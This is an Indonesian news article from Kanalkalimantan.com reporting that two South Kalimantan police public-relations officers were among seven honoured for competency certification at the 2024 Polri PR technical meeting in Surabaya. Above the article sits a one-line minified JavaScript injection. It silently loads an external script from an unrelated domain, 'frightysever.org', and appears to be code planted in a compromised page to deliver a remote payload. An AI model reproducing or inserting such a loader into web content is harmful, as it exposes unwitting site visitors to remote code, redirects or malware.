(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Dua Anggota Polda Kalsel Masuk 7 Terbaik Penghargaan Divisi Humas Polri


KANALKALIMANTAN.COM, BANJARBARU – Kadiv Humas Polri Irjen Sandi Nugroho memberikan penghargaan kepada tujuh anggota Humas Polri dengan nilai sertifikasi kompetensi umum terbaik.

Dua anggota Humas Polri diantara yang mendapat penghargaan adalah Kasubbid Mulmed Humas Polda Kalimantan Selatan (Kalsel) Pembina Sri Widayati dan Kabid Humas Polda Kalsel Kombes Pol Adam Erwindi.

Kabid Humas dan Kasubdit Mulmed Polda Kalsel masuk dalam tujuh yang terbaik.

Penghargaan diberikan langsung dalam penutupan Rapat Kerja Teknis (Rakernis) Humas Polri 2024 di Hotel Wyndham, Surabaya, Jawa Timur, Selasa (23/4/2024) malam.

Baca juga: Sinyal H Muhidin-Hasnur di Pilgub Kalsel dari Foto ‘Kemesraan Politik’ Mengapit Crazy Rich HI

Kadiv Humas Polri Irjen Pol Sandi Nugroho mengatakan, penghargaan ini sebagai bentuk apresiasi bagi jajaran humas yang telah melewati sertifikasi dengan nilai terbaik.

“Diharapkan dengan adanya kompetensi itu akan semakin mendukung kerja-kerja Polri dalam melayani masyarakat,” terang Irjen Sandi dalam keterangan yang diterima Kanalkalimantan.com, Rabu (24/4/2024).

Lima anggota jajaran Humas lain yang mendapatkan penghargaan itu adalah Kaur Penum Subbidpenmas Humas Polda Maluku AKP Wehelmina Melda Haurissa, Kabid Humas Polda Bangka Belitung Kombes Jojo Sutarjo, Kabid Humas Polda Riau Kombes Hery Murwono.

Kemudian Kasubbidpenmas Humas Polda DIY AKBP Verena Sri Wahyuningsih dan Kaur Penmas Humas Polda Bangka Belitung AKP Candra Wijaya.

Baca juga: Berikan Pelayanan Maksimal, Pemkab Banjar Bentuk Tim Pelaksana Pemberangkatan dan Pemulangan CJH

Dalam Rakernis Humas Polri 2024, Irjen Sandi meminta seluruh jajaran Humas Polri meningkatkan kemampuan dalam menghadapi tantangan nasional maupun global.

“Sehingga kita semua semakin siap dalam menghadapi tantangan yang mungkin muncul kedepan. Sehingga dapat mendukung stabilitas Kamtibmas guna percepatan transformasi ekonomi inklusif dan berkelanjutan,” tuturnya.

Saat ini Divisi Humas Polri telah menghadirkan e-Learning Humas Presisi sebagai sarana pembelajaran bagi seluruh personel untuk memiliki sertifikasi kompetensi umum kehumasan.

“Beberapa waktu lalu telah dilakukan pelatihan kompetensi kehumasan kepada Bintara, Pama, Pamen, serta PNS Divisi Humas Polri. Kedepan akan dilaksanakan sertifikasi kompetensi kehumasan kepada personel Bidhumas Polda jajaran,” jelas dia.

Irjen Sandi menuturkan, peningkatan kemampuan kompetensi kehumasan penting dilakukan guna menyongsong Indonesia Emas 2045.

Baca juga: Ini Daftar 58 Penghargaan Kota Banjarbaru dari 2021 hingga 2024

Seperti yang diutarakan Presiden Jokowi membawa Indonesia menggapai cita-cita Indonesia Emas 2045 ada tiga hal pokok yang menjadi acuan yaitu pentingnya stabilitas bangsa, harus ada berkelanjutan dan kesinambungan dan pentingnya peningkatan kualitas SDM.

Sementara itu, Kapolri Jenderal Listyo Sigit Prabowo dalam pembukaan Rakernis 5 Divisi termasuk Divisi Humas meminta jajaran kehumasan baik anggota Polri dan seluruh ASN pada Polri untuk membangun persepsi positif terhadap Polri dengan narasi Polri yang tegas, humanis dan merakyat. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Muhammad Andi

Recent Posts

Diskusi Santai “Komunitas Gembel Banjarmasin” Bahas Kesejahteraan Buruh

KANALKALIMANTAN.COM, BANJARMASIN - Masih dalam momentum Hari Buruh 2024, Komunitas Gemar Belajar (Gembel) Banjarmasin menggelar… Read More

2 jam ago

Penyediaan Rumah ASN dan Tenaga Kontrak, Pemkab Kapuas Gandeng Pengembang Perumahan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat Bupati Kapuas Erlin Hardi melakukan penandatanganan MoU antara PT Mahakarya… Read More

3 jam ago

Status Internasional Dicabut, Bandara Syamsudin Noor Tetap Jadi Embarkasi Haji

KANALKALIMANTAN.COM, BANJARBARU - Kementerian Perhubungan (Kemenhub) memutuskan mencabut status Bandara Syamsudin Noor Banjarmasin di Banjarbaru… Read More

5 jam ago

Syarat Calon Non Partai Pilkada Banjarmasin Wajib Miliki 41 Ribu KTP Dukungan

KANALKALIMANTAN.COM, BANJARMASIN - Jelang Pemilihan Kepala Daerah (Pilkada) 2024, kandidat bakal calon Wali Kota dan… Read More

6 jam ago

MUI Banjar Berikan Pembekalan kepada Jemaah Calon Haji Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Jemaah Calon Haji (JCH) Kabupaten Banjar Tahun 2024 yang seluruhnya berjumlah 452… Read More

6 jam ago

Pj Bupati HSU Pimpin Peringatan Hardiknas 2024

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara (HSU) menggelar peringatan Hari Pendidikan Nasional (Hardiknas)… Read More

7 jam ago

This website uses cookies.